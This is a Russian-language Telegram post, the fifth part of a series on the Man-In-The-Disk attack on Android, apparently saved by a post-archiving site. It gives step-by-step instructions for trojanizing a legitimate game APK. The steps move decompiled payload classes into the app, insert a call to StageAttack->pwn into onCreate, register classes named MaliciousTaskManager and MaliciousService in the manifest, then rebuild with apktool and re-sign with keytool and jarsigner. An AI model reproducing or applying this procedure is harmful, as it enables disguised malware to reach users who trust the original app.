.
.NET Kings
@netskings7.9K подп.
5.8Kпросмотров
73.6%от подписчиков
6 октября 2025 г.
📷 ФотоScore: 6.4K
👁‍🗨Hello world~ Атака Man-In-The-Disk на Android. Часть 5 Внедрение полезной нагрузки 2 • Финальный пост по этой теме, продолжаем и наконец внедрим полезную нагрузку в приложение. • Для получаения smali кода нашей нагрузки, соберем его в APK и декомпилируем, после чего переносим наши три декомпилированных класса по пути smali&#092;kz&#092;c&#092;signscan, в папку com/halfbrick/mortar и меняем package name всем классам, с kz.c.signscan на com.halfbrick.mortar. Пример: • Было: .class public Lkz/c/signscan/StageAttack; • Стало: .class public Lcom/halfbrick/mortar/StageAttack; • В smali классе MainActivity берем строчку вызова пейлоада: invoke-static {p0}, Lcom/halfbrick/mortar/StageAttack;->pwn(Landroid/content/Context;)V • И вставляем в MortarGameActivity. В итоге метод onCreate() выглядит: .method protected onCreate(Landroid/os/Bundle;)V .locals 9 :try_start_0 const-string v0, "android.os.AsyncTask" .line 465 invoke-static {v0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class; :try_end_0 .catch Ljava/lang/Throwable; {:try_start_0 .. :try_end_0} :catch_0 .line 471 :catch_0 invoke-super {p0, p1}, Landroid/support/v4/app/FragmentActivity;->onCreate(Landroid/os/Bundle;)V .line 472 invoke-static {p0}, Lcom/halfbrick/mortar/StageAttack;->pwn(Landroid/content/Context;)V .line 473 invoke-static {}, Lcom/halfbrick/mortar/NativeGameLib;->TryLoadGameLibrary()Z .line 475 invoke-virtual {p0}, Lcom/halfbrick/mortar/MortarGameActivity;->getIntent()Landroid/content/Intent; • Класс MaliciousTaskManager в payload это BroadcastReceiver, а MaliciousService это IntentService, поэтому мы должны их прописать в манифесте. <receiver android:name=".MaliciousTaskManager"/> <service android:name=".MaliciousService"/> • Запаковываем все обратно командой apktool b myfolder и получаем apk файл. Теперь нам необходимо его подписать, чтобы андроид принял наше приложение. Для начала сгенерируем ключ, которым будем подписывать: keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000 • Подписываем apk: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore my_application.apk alias_name • Все, мы вшили полезную нагрузку в безопасное приложение. Удачи! • Поддержать автора монеткой: @v_meshke
5.8K
просмотров
2388
символов
Нет
эмодзи
Да
медиа

Другие посты @netskings

Все посты канала →
👁‍🗨Hello world~ Атака Man-In-The-Disk на Android. Часть 5 — @netskings | PostSniper